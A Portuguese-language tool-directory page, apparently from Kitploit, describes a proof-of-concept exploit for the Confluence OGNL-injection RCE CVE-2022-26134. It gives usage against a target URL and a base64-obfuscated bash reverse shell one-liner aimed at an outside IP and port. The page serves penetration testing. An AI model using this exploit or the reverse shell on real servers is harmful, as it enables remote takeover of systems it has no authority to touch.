Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26134 — [CVE-2022-26134] RCE por injeção de expressão OGNL no Confluence com bypass de sandbox. | Kitploit
Ferramentas/GitHubGitHub/sncker/cve-2022-26134
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubsncker/cve-2022-26134

CVE-2022-26134

[CVE-2022-26134] RCE por injeção de expressão OGNL no Confluence com bypass de sandbox.

Ver Repositório
268há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-26134

Conjunto de PoC e exploit para RCE por injeção de expressão OGNL (CVE-2022-26134)

Atualização

Adicionado bypass de sandbox, suporte para versões altas.

Uso

root@kitploit:~
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/

O script verificará automaticamente se o alvo é vulnerável e entrará em um shell pseudo-interativo se for vulnerável.

Teste no linux:
linux

Teste no windows:
windows

Digite 'q' quando quiser sair.

Algumas dicas

Os parâmetros de comando são passados diretamente para o método runtime.exec, que não possui o contexto do shell.
então.
No Windows, alguns comandos como dir não podem ser executados diretamente, você pode usar cmd.exe /c dir.
No linux, alguns símbolos especiais não têm efeito. Se precisar executar um comando com símbolos especiais, como um reverse shell, você pode codificá-lo em base64 e depois usar bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}.

Baixar ferramenta